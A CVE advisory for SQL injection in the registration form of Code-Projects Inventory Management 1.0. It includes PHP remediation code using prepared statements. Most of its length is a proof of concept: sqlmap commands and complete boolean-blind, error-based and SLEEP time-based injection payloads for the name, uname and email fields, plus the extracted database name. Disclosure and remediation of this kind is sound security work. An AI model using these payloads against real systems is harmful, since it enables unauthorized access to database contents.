CVE-2023-46581-Code-Projects-Inventory-Management-1.0-SQL-Injection-Vulnerability

  • Exploit Author: ersinerenler

Vendor Homepage

Software Link

Overview

  • Code-Projects Inventory Management V1.0 is susceptible to a SQL injection vulnerability caused by insufficient protection of the 'name', 'uname' and 'email' parameters in the registration.php file. The flaw can be exploited to inject malicious SQL queries, leading to unauthorized access to, and extraction of, sensitive information from the database.

Vulnerability Details

  • CVE ID: CVE-2023-46581
  • Affected Version: Code-Projects Inventory Management V1.0
  • Vulnerable File: /registration.php
  • Parameter Names: name, uname, email

References:

Description

  • The lack of proper input validation and sanitization on the 'name', 'uname' and 'email' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.
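
The root cause above is a query assembled from raw form fields. The following is an added example written for this page, not code from the Inventory Management project: it places a reconstruction of the unsafe pattern (the project's real source may differ) beside a hardened handler. It assumes a `users` table with columns `name`, `uname`, `email` and `password` and a mysqli connection; both are assumptions. The stand-alone section at the bottom needs no database and runs the validator over a clean submission and over the three field values quoted in the sqlmap output below.

```php
<?php
declare(strict_types=1);

// Added example, not code from the Inventory Management project. Assumes a
// `users` table (name, uname, email, password) and a live mysqli connection;
// both are assumptions chosen for illustration.

// The pattern the advisory describes, reconstructed for contrast: form fields
// concatenated straight into the SQL text, so a quote in `name`, `uname` or
// `email` closes the string literal and the rest of the value is parsed as SQL.
function register_user_unsafe(mysqli $db, array $post): bool
{
    $sql = "INSERT INTO users (name, uname, email, password) VALUES ('"
         . $post['name'] . "', '" . $post['uname'] . "', '"
         . $post['email'] . "', '" . $post['password'] . "')";
    return $db->query($sql) !== false;
}

// Allow-list validation of the three fields named in the advisory. Returns a
// list of error strings; an empty list means the input is acceptable. This is
// a first filter only: the SQL fix below does not depend on it.
function validate_registration(array $post): array
{
    $errors   = [];
    $name     = trim((string) ($post['name'] ?? ''));
    $uname    = trim((string) ($post['uname'] ?? ''));
    $email    = trim((string) ($post['email'] ?? ''));
    $password = (string) ($post['password'] ?? '');

    // Display name: letters, digits, space, dot, hyphen, apostrophe; 1..64 chars.
    if (!preg_match('/^[\p{L}\p{N} .\'-]{1,64}$/u', $name)) {
        $errors[] = "name: letters, digits, space, . ' - only (1-64 chars)";
    }
    // Username: ASCII word characters only; 3..32 chars.
    if (!preg_match('/^[A-Za-z0-9_]{3,32}$/', $uname)) {
        $errors[] = 'uname: letters, digits, _ only (3-32 chars)';
    }
    // E-mail: PHP's built-in syntax check plus a length cap.
    if (strlen($email) > 254 || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'email: not a valid address';
    }
    if (strlen($password) < 8 || $password !== (string) ($post['rpassword'] ?? '')) {
        $errors[] = 'password: at least 8 chars and must match rpassword';
    }
    return $errors;
}

// Hardened handler: validate, then bind every value as a parameter. With a
// prepared statement the SQL text is fixed before the values are sent, so a
// quote, || or a subquery inside a value is stored as data, never executed.
function register_user(mysqli $db, array $post): bool
{
    $errors = validate_registration($post);
    if ($errors !== []) {
        throw new InvalidArgumentException(implode('; ', $errors));
    }
    $name  = trim((string) $post['name']);
    $uname = trim((string) $post['uname']);
    $email = trim((string) $post['email']);
    $hash  = password_hash((string) $post['password'], PASSWORD_DEFAULT);

    $stmt = $db->prepare(
        'INSERT INTO users (name, uname, email, password) VALUES (?, ?, ?, ?)'
    );
    $stmt->bind_param('ssss', $name, $uname, $email, $hash);
    return $stmt->execute();
}

// Stand-alone check (no database needed): run the validator over a clean
// submission and over three field values copied from the advisory's sqlmap
// output, constructed here as test inputs.
if (PHP_SAPI === 'cli') {
    $base = ['name' => 'test', 'uname' => 'testersin', 'email' => 'test@test.com',
             'password' => 'Test123!', 'rpassword' => 'Test123!'];
    // Array union: the left-hand key overrides the same key in $base.
    $cases = [
        'clean' => $base,
        'name'  => ['name'  => "test'||(SELECT 0x786e556a WHERE 8460=8460 AND 6306=6306)||'"] + $base,
        'uname' => ['uname' => "testersin'||(SELECT 0x76794d63 WHERE 8027=8027 AND 6162=6162)||'"] + $base,
        'email' => ['email' => "test@test.com' AND (SELECT 7637 FROM (SELECT(SLEEP(5)))yslj) AND 'HvYI'='HvYI"] + $base,
    ];
    foreach ($cases as $label => $post) {
        $errors = validate_registration($post);
        printf("%-6s %s\n", $label, $errors === [] ? 'accepted' : 'rejected: ' . implode('; ', $errors));
    }
}
```

Run with `php example.php` to see the clean submission accepted and the three injected values rejected by the allow-list. The prepared statement in `register_user` is the actual fix for the advisory's finding; the validator only narrows the input space, which is why `name` still tolerates an apostrophe (O'Brien) without any risk to the query.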

Proof of Concept (PoC):

  • Go to the registration page: http://localhost/Inventory-Management/view/registration.php
  • Fill in the form and click the 'Submit' button
  • Intercept the request with Burp Suite
  • Copy and paste the request into a request.txt file
  • Then use sqlmap to exploit
  • sqlmap -r request.txt -p name --risk 3 --level 5 --dbms mysql --batch --current-db
---
Parameter: MULTIPART name ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"

test'||(SELECT 0x786e556a WHERE 8460=8460 AND 6306=6306)||'
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"

testersin
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"

test@test.com
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"

Submit
-----------------------------358741317412787265312048716550--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"

test'||(SELECT 0x42474e51 WHERE 2291=2291 AND (SELECT 9160 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(9160=9160,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"

testersin
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"

test@test.com
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"

Submit
-----------------------------358741317412787265312048716550--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"

test'||(SELECT 0x7a477657 WHERE 4458=4458 AND (SELECT 2615 FROM (SELECT(SLEEP(5)))fPSA))||'
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"

testersin
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"

test@test.com
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"

Submit
-----------------------------358741317412787265312048716550--

---
  • sqlmap -r request.txt -p uname --risk 3 --level 5 --dbms mysql --batch --current-db
---
Parameter: MULTIPART uname ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"

test
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"

testersin'||(SELECT 0x76794d63 WHERE 8027=8027 AND 6162=6162)||'
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"

test@test.com
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"

Submit
-----------------------------358741317412787265312048716550--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"

test
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"

testersin'||(SELECT 0x79515248 WHERE 2650=2650 AND (SELECT 1470 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(1470=1470,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"

test@test.com
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"

Submit
-----------------------------358741317412787265312048716550--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"

test
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"

testersin'||(SELECT 0x4d59474e WHERE 7393=7393 AND (SELECT 3657 FROM (SELECT(SLEEP(5)))vDUR))||'
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"

test@test.com
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"

Submit
-----------------------------358741317412787265312048716550--
---
  • sqlmap -r request.txt -p email --risk 3 --level 5 --dbms mysql --batch --current-db
---
Parameter: MULTIPART email ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"

test
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"

testersin
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"

test@test.com' RLIKE (SELECT (CASE WHEN (6850=6850) THEN 0x74657374657273696e3840676d61696c2e636f6d ELSE 0x28 END)) AND 'Jpfy'='Jpfy
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"

Submit
-----------------------------358741317412787265312048716550--

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"

test
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"

testersin
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"

test@test.com' OR (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(9832=9832,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZTBd'='ZTBd
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"

Submit
-----------------------------358741317412787265312048716550--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="name"

test
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="uname"

testersin
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="email"

test@test.com' AND (SELECT 7637 FROM (SELECT(SLEEP(5)))yslj) AND 'HvYI'='HvYI
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="password"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="rpassword"

Test123!
-----------------------------358741317412787265312048716550
Content-Disposition: form-data; name="submit"

Submit
-----------------------------358741317412787265312048716550--
---
  • current database: inventory_project